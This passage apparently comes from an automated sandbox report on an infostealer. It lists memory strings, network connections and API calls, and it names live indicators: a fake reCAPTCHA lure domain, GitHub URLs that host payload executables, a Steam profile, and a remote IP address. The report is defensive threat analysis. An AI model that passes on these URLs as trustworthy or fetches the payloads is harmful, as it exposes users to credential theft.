                  Source: RegSvcs.exe, 0000000C.00000002.3330506711.00000000053B3000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: RegSvcs.exe, 0000000C.00000002.3287680799.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab1
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: RegSvcs.exe, 0000000B.00000002.2124142825.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                  Source: powershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000000.00000002.2060609253.000002793F61B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2125339652.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2102151892.0000020E2D3B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                  Source: mshta.exe, 00000003.00000003.2106417373.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106547656.0000020E2D439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105666148.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106126871.0000020E2CCD3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D43D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                  Source: powershell.exe, 00000000.00000002.2060609253.000002793F5CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000000.00000002.2060609253.000002793F5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=I8QM230l1pb_&a
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=dK492ur3
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=ugSp
                  Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000004.00000003.2078790926.000001A4C4DE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: mshta.exe, 00000003.00000003.2105547941.000002062AA66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137414096.000002062AA67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074972565.000002062AA66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: powershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: qmgr.db.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.000000000116A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.000000000116A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900R
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                  Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/
                  Source: mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, 00.ps1String found in binary or memory: https://view-reserve.com/recaptcha-verify.html
                  Source: mshta.exe, 00000003.00000002.2152048754.0000020E2CC92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.html...
                  Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.html8
                  Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlB
                  Source: mshta.exe, 00000003.00000003.2096831350.000002062AAB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2136717878.000002062A9D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137977166.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105489121.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088207114.000002062AAA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlC:
                  Source: mshta.exe, 00000003.00000002.2139043663.000002062AB50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlH
                  Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlINetCookies
                  Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlK
                  Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlL
                  Source: mshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlLMEM
                  Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlU
                  Source: mshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlX
                  Source: mshta.exe, 00000003.00000003.2105602304.0000020E2CE9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwla
                  Source: mshta.exe, 00000003.00000002.2139261010.000002062AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.html_AP
                  Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmld
                  Source: mshta.exe, 00000003.00000002.2153759540.0000020E2CF10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmldJ
                  Source: mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmleS
                  Source: mshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.html
                  Source: mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106321743.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlp-
                  Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmly
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 92.255.57.120:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49711 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,13_2_004363E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,13_2_004363E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,13_2_00436590
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01950EE0 NtSetValueKey,11_2_01950EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01950ED8 NtSetValueKey,11_2_01950ED8
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8488E85295_2_00007FF8488E8529
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8488E56805_2_00007FF8488E5680
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8488E67F05_2_00007FF8488E67F0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8488D5D777_2_00007FF8488D5D77
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848905D7F8_2_00007FF848905D7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C237F12_2_064C237F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C004012_2_064C0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C245412_2_064C2454
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C238812_2_064C2388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C000612_2_064C0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C1E2E12_2_064C1E2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C1E3712_2_064C1E37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_064C1F2512_2_064C1F25
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00440A0D13_2_00440A0D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040AE6013_2_0040AE60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040874013_2_00408740
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043005013_2_00430050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041107813_2_00411078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042A81013_2_0042A810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043381013_2_00433810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004270D013_2_004270D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004058E013_2_004058E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0042D89313_2_0042D893
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004148B013_2_004148B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004288BA13_2_004288BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043614013_2_00436140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041597513_2_00415975
